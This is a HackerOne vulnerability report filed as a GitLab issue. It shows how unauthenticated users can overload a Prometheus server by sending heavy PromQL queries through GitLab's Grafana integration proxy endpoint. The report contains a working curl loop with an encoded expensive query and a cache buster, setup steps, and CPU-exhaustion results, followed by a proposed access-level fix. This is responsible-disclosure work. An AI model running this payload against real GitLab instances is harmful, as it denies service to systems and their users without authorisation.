DoS and high resource consumption of Prometheus server through abuse of Grafana integration proxy endpoint

HackerOne report #1723106 by joaxcar on 2022-10-04, assigned to GitLab Team:

Report | Attachments | How To Reproduce

Report

As I previously mentioned in my report on path traversal in the Grafana integration, an unauthenticated user can DoS the configured Prometheus server by sending heavy PromQL queries to the https://gitlab.example.com/group1/project1/-/grafana/proxy/ endpoint. As this issue was not addressed by the patch for the path traversal, I thought I might as well report it separately.

Summary

I am no Prometheus expert, so the described scenario can probably be expanded and improved upon (from a DoS perspective). But I did force my docker container with 16 cores to work at a constant 100% CPU with only 20 requests (the requests are asynchronous, meaning that the connection from the attacker to GitLab will succeed, while the connection between GitLab and Prometheus will persist). When the attack was executed, I could not restart Prometheus from the terminal with gitlab-ctl stop prometheus as the service was unresponsive, and a gitlab-ctl restart did not fix it. I had to stop the docker container to make it stop. The impact of the attack depends somewhat on the amount of data on the Prometheus server; as I only tested this on my localhost GitLab Prometheus server, it is almost empty compared to real-life servers.

The setup

I booted up a GitLab Omnibus instance in a docker container, which includes a Grafana instance (https://gitlab.example.com/-/grafana) and a Prometheus instance (http://localhost:9090). I also configured SSL and a DNS record for my server (spoofed via the hosts file).
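For reference, the spoofed DNS record is just an entry in the hosts file of the attacking machine pointing the name at the docker host (the IP below is a placeholder; adjust it to your setup):

echo "192.168.1.10 gitlab.example.com" | sudo tee -a /etc/hosts  # replace 192.168.1.10 with your docker host's address  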

The Grafana instance already has the Prometheus instance as a datasource, so it's possible to use this instance for test purposes. I then configured the Grafana integration in a public project, following https://docs.gitlab.com/ee/operations/metrics/embed_grafana.html .

Let's say that the project is located at https://gitlab.example.com/group1/project1 ; then the proxy endpoint is located at https://gitlab.example.com/group1/project1/-/grafana/proxy/ . This -/grafana/proxy path has nothing to do with the Grafana instance in Omnibus, they just look similar. The datasource ID for Prometheus will probably be either 1 or 2.
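As a sanity check before attacking, a cheap query can be sent through the proxy first. This is just a sketch, assuming datasource ID 2 as in my setup (use -k only if your certificate is not trusted locally); because the proxy handles queries asynchronously, as noted above, the first call may not return the final result immediately, so repeat it after a moment:

now=$(date +%s)  
curl -sk "https://gitlab.example.com/group1/project1/-/grafana/proxy/2/api/v1/query_range?query=up&start_time=$((now-3600))&end_time=$now&step=60"  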

You might need to run the server for a while to have some data in Prometheus. After a fresh boot I used Burp to perform a scan towards my localhost GitLab instance to fill up the server with HTTP requests; I did this two times with a spacing of 24 hours.
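Any source of HTTP traffic against the instance works for this. As a rough alternative to a Burp scan, a plain request loop does the job (just a sketch, hitting the public explore page; -k only if your certificate is not trusted locally):

for i in {1..500}  
do  
curl -sk https://gitlab.example.com/explore > /dev/null  
done  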

The attack

As an unauthenticated user, I can now DoS the Prometheus server (and possibly also affect the overall system state of the docker instance) by running this command in a terminal:

for index in {1..20}  
do  
curl 'https://gitlab.example.com/group1/project1/-/grafana/proxy/2/api/v1/query_range?query=min_over_time(api_requests_total%5B1000h%5D)%20%25%20max_over_time(http_requests_total%5B1000h%5D)%20%25%20histogram_quantile(0.9%2C%20sum%20by%20(job)%20(rate(http_requests_total%7Bjob%3D~%22.%2B%22%7D%5B100'$index'h%5D)))&start_time=1654749435&end_time=1654771035&step=15'  
done  

To get it working, you might need to modify start_time and end_time to something relevant (use date +%s in a terminal to get the current timestamp). Also, the ID after grafana/proxy/ needs to match the ID of the Prometheus datasource in Grafana. If 20 requests are not enough, try increasing the number.
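For example, to cover the last six hours (any window that overlaps the data in Prometheus works), compute the timestamps like this and substitute them into the curl URL above:

end_time=$(date +%s)  
start_time=$((end_time - 6*3600))  
echo "start_time=$start_time end_time=$end_time"  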

In the docker container, run htop or top to monitor the CPU.

Some details

The anatomy of the request, pulled apart, looks like this:

https://gitlab.example.com/group1/project1/-/grafana/proxy <-- The project proxy endpoint

/2/api/v1/query_range <-- API call to Prometheus through the Grafana proxy

?query= <-- Start of the query parameter

min_over_time(api_requests_total%5B1000h%5D)%20%25%20max_over_time(http_requests_total%5B1000h%5D)%20%25%20histogram_quantile(0.9%2C%20sum%20by%20(job)%20(rate(http_requests_total%7Bjob%3D~%22.%2B%22%7D%5B100 <-- An expensive query, just a mess that I made up trying to eat resources

$index <-- Index used as a cache buster

h%5D)))&start_time=1654749435&end_time=1654771035&step=15 <-- The rest of the query, plus the time range and step parameters

It is important to note that the query is arbitrary; I just tried to construct one that was heavy enough to tilt the server. This could probably be made way heavier. Also note the use of index in the query: this is a "cache buster" that is needed because the GitLab backend will not run multiple queries towards Prometheus if the query string is identical.
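For readability, this is the same query with the URL encoding removed; note how $index ends up inside the last range selector ([1001h], [1002h], ...), which is what makes each request unique:

min_over_time(api_requests_total[1000h]) % max_over_time(http_requests_total[1000h]) % histogram_quantile(0.9, sum by (job) (rate(http_requests_total{job=~".+"}[100${index}h])))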

Result

Here are some images from my test run on my local system

This is the server htop output directly after getting 20 requests from the attacker. All 16 cores are working at 100%

100_LI.jpg

This is the state of the server 5 minutes later; no additional requests from the attacker have been made.

5min_LI.jpg

When accessing Grafana through the web client I can still get an extremely simple request to run; it usually takes about 50 milliseconds to get the response. During the attack it took 1 minute.

block_LI.jpg

Steps to reproduce

(If you have any other Grafana instance to test with, use that one. I will describe the attack with the docker GitLab Omnibus image.)

  1. Boot up a docker image of the latest GitLab Omnibus (see https://docs.gitlab.com/ee/install/docker.html).
  2. Follow this guide to enable admin login (and username/password login) on the local Grafana instance: https://docs.gitlab.com/omnibus/settings/grafana.html
  3. Log in to the new Grafana instance on http://gitlab.example.com as admin.
  4. Create an API key by visiting /-/grafana/org/apikeys. Make sure to generate an Admin key.
  5. Create a new project on the GitLab instance.
  6. Go to http://gitlab.example.com/GROUP/PROJECT/-/settings/operations and expand Grafana integration.
  7. Configure it with http://gitlab.example.com/-/grafana and the API key.
  8. Now make sure there is some data in Prometheus: make a bunch of requests to the GitLab instance over a period of time (for example with the request loop sketched earlier).
  9. Open a terminal and get a shell on the docker container, e.g.:
docker exec -it gitlab /bin/bash  
  10. Run top to monitor the CPU level.
  11. Open another terminal and run:
date +%s  
  12. Take the current timestamp and update start_time and end_time in this script accordingly:
for index in {1..100}  
do  
curl 'https://gitlab.example.com/group1/project1/-/grafana/proxy/2/api/v1/query_range?query=min_over_time(api_requests_total%5B1000h%5D)%20%25%20max_over_time(http_requests_total%5B1000h%5D)%20%25%20histogram_quantile(0.9%2C%20sum%20by%20(job)%20(rate(http_requests_total%7Bjob%3D~%22.%2B%22%7D%5B100'$index'h%5D)))&start_time=1654749435&end_time=1654771035&step=15'  
done  
  13. Run it and watch the CPU in top. If there is enough data in the instance, all processors should spike to 100%. (An optional way to confirm the Prometheus-side load directly is sketched below.)
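To confirm the Prometheus-side load directly (a sketch, assuming the Omnibus default of Prometheus listening on localhost:9090), you can ask Prometheus itself for its number of in-flight queries from inside the container; during the attack even this trivial query may be slow or time out, which in itself demonstrates the impact:

curl -s 'http://localhost:9090/api/v1/query?query=prometheus_engine_queries'  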

Impact

DoS and high resource consumption on the Prometheus server

What is the current bug behavior?

No special permissions are required to run arbitrary queries (executed as admin, since the Grafana token is an admin token) towards a configured Grafana instance.

There are two issues. First of all, any user with any access to the project can execute arbitrary queries (including unauthenticated users on public projects). Second, as the queries are arbitrary, they can be as complex as the attacker wants and can thus break the Prometheus server. A user can make over 100 requests in one go and GitLab will gladly pass them along to Grafana. Even though GitLab looks to have a concurrency limit of around 20, the rest are run as others finish.

What is the expected correct behavior?

Users need to be limited in what queries they are allowed to run, or there should be a restriction on who can make the queries.

Output of checks

This bug happens on GitLab.com

Results of GitLab environment info

[Redacted]


Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section:

Proposed solution

From #378456 (comment 1194850384):

Elevate access levels to Reporter+ for public projects only, leaving private/protected as-is.

Edited by Sarah Yasonik